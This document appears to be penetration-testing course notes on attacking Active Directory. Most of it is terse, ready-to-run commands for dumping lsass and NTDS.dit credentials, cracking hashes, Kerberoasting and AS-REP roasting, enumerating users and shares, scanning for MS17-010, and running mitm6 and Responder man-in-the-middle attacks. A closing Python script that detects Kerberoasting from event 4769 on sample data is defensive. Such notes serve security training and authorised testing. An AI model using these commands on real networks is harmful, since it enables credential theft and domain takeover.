# L5. Active Directory vulnerabilities

## 1. Starting point

```bash=
cat /etc/resolv.conf
nmcli dev show eth2
nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>
nmap --script broadcast-dhcp-discover
```

---

## 2. Password stealing

### Crackmapexec

```bash=
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --sam
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --lsa
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --ntds
```

### Procdump

:::info
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
:::

```bash=
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
```

### Remote procdump

```bash=
python3 psexec.py <domain>/<user>:<password>@<ip> "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"
```

```bash=
# impacket smbclient.py; the lines after it are typed at its interactive prompt
python3 smbclient.py <domain>/<user>@<ip>
use C$
cd Windows
cd Temp
put procdump.exe
get lsass.dmp
rm procdump.exe
rm lsass.dmp
```

### lsass analysis

```bash=
C:\>mimikatz.exe
sekurlsa::minidump <DUMPFILENAME>
sekurlsa::LogonPasswords
```

```bash=
pypykatz lsa minidump <lsass.dmp>
```

### NTDS

```bash=
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\Windows\Temp\ntds
ifm: quit
ntdsutil: quit
```

```bash=
ntdsutil.exe "activate instance ntds" "ifm" "create full C:\Windows\Temp\ntds" quit quit
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```

```bash=
python3 secretsdump.py <domain>/<user>:<password>@<ip> -just-dc
```

```bash=
python3 secretsdump.py -ntds '/home/kali/Downloads/Active Directory/ntds.dit' -system '/home/kali/Downloads/registry/SYSTEM' -outputfile hashes.ntds LOCAL
```

### Hash cracking

```bash=
hashcat -m 1000 <hashes.file> <dictionary.file> --force
```

---

## 3. *roasting

### Kerberoasting

```bash=
python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:'<password>'
```

```bash=
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
```

### AS-REP roasting

```bash=
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <hashcat | john> -outputfile <output_AS_REP_responses_file>
```

```bash=
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>
```

---

## 4. Enumeration

### Users

```bash=
enum4linux -U <dc-ip> | grep 'user:'
cme smb <ip> -u <user> -p '<password>' --users
```

### Kerberos

```bash=
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=names.txt <ip>
python kerbrute.py -domain <domain> -users users.txt -passwords passwords.txt -outputfile output.txt
```

### SMB shares

```bash=
while read ip; do echo $ip; smbmap -r --depth 1 -H $ip; done < <ips_file> | tee <smbmap_without_auth_file>
while read ip; do echo $ip; smbmap -u <user> -p '<password>' -d <domain> -r --depth 1 -H $ip; done < <ips_file> | tee <smbmap_user_file>
```

---

## 5. Active Directory dumping

```bash=
python ldapdomaindump.py -u '<domain>\<user>' -p <password> -o ldapdomaindump -n <ns_ip> <dc_ip>
```

### Sysvol

```bash=
smbclient -U <user> -L <ip>
smbclient \\\\<ip>\\sysvol -U <user>
prompt off
recurse on
lcd /home/kali/Downloads/sysvol
mget ./*
```

### Bloodhound

```bash=
./bloodhound.py -u <username> -p '<password>' -d <domain> -ns <ns_ip> -dc <dc_hostname>
```

---

## 6. Scanning

### RunFinger

```bash=
python RunFinger.py -i <ip/mask>
```

### MS17-010 (exploited by WannaCry)

```bash=
nmap -n -Pn -sT -v --script smb-vuln-ms17-010 -p445 --open -oA ms17-010-nmap <ip>
~/tools/wannacry/wannacry -net <ip/mask> -out <ip>-ms17-010-wanna.txt
```

### Nmap

```bash=
sudo nmap -Pn -sT --script=vulners -sV --open -oA all-ports-nmap -p 21,22,2222,23,80,8000,8001,8002,8004,8006,8007,8008,8080,8888,88,139,143,389,443,8443,9443,445,623,49152,636,1099,1433,1434,1500,2001,2010,2181,2375,2809,9043,9060,9080,9501,9502,9503,5558,5559,7873,8879,3306,3389,5800-5810,5900,5901,5432,5433,5555,5557,5666,10050,10051,7001,9000,27017,27018,50013,1521-1527,3200-3299,4786,9200,9300,5985,5986,50070,6443,8111,8500,8501,8200,8201,10250 <ip/mask>
```

### IOXIDResolver

```bash=
cat <ips-file> | xargs -I IP python IOXIDResolver.py -t IP | tee <IOXIDResolver-file>
```

### onesixtyone

```bash=
sudo ./onesixtyone -c snmp_pass.txt -o <onesixtyone-file.txt> <ip/mask>
```

---

## 7. MiTM

### mitm6

```bash=
sudo python3 mitm6.py -i eth2 -v -d <domain>
sudo python3 smbserver.py -ip <local-ip> data /tmp | tee <mitm6_file>
```

### Responder

```bash=
sudo python3 Responder.py -I eth2 -A
```
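A defender-side complement to the Kerberoasting commands in the *roasting section above, added here and not part of the original notes: a Python check over Windows Security event 4769 (Kerberos service ticket requested) that flags the trace a bulk GetUserSPNs.py request leaves on the domain controller, namely RC4 (TicketEncryptionType 0x17) tickets for several user service accounts within a short window. The event records are constructed sample data with simplified field names (assumed mapping: time = TimeCreated, user = TargetUserName, service = ServiceName, etype = TicketEncryptionType).

```python
"""Flag likely Kerberoasting from Windows Security event 4769 records.

Added defender-side example; assumes 4769 events already parsed into dicts
with the simplified field names below. The data is constructed, not real logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 events. TicketEncryptionType 0x17 = RC4-HMAC,
# 0x12 = AES256-CTS-HMAC-SHA1-96. Services ending in "$" are machine accounts.
EVENTS = [
    {"time": "2024-01-10T09:00:01", "user": "jdoe@CORP.LOCAL", "service": "sql_svc", "etype": "0x17"},
    {"time": "2024-01-10T09:00:02", "user": "jdoe@CORP.LOCAL", "service": "http_svc", "etype": "0x17"},
    {"time": "2024-01-10T09:00:02", "user": "jdoe@CORP.LOCAL", "service": "backup_svc", "etype": "0x17"},
    {"time": "2024-01-10T09:00:03", "user": "jdoe@CORP.LOCAL", "service": "WS01$", "etype": "0x17"},
    {"time": "2024-01-10T09:05:00", "user": "asmith@CORP.LOCAL", "service": "sql_svc", "etype": "0x12"},
    {"time": "2024-01-10T09:07:00", "user": "asmith@CORP.LOCAL", "service": "krbtgt", "etype": "0x17"},
]


def is_roastable_request(ev):
    """True for an RC4 service ticket for a user (non-machine, non-krbtgt)
    service account: the ticket type an offline cracking attempt needs."""
    svc = ev["service"]
    return ev["etype"].lower() == "0x17" and not svc.endswith("$") and svc.lower() != "krbtgt"


def detect_kerberoasting(events, threshold=3, window=timedelta(minutes=5)):
    """Return {user: sorted distinct services} for every requesting account
    that obtained RC4 tickets for >= threshold distinct service accounts
    inside any sliding window of the given length."""
    per_user = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_user[ev["user"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()  # chronological, so each index can open a window
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= threshold:
                hits[user] = sorted(in_window)
                break
    return hits


if __name__ == "__main__":
    for user, services in detect_kerberoasting(EVENTS).items():
        print(f"possible Kerberoasting by {user}: {services}")
```

Enabling AES-only service accounts and auditing 4769 on the DCs is what makes this check meaningful; once RC4 is gone from the environment, any 0x17 ticket request is itself the alert.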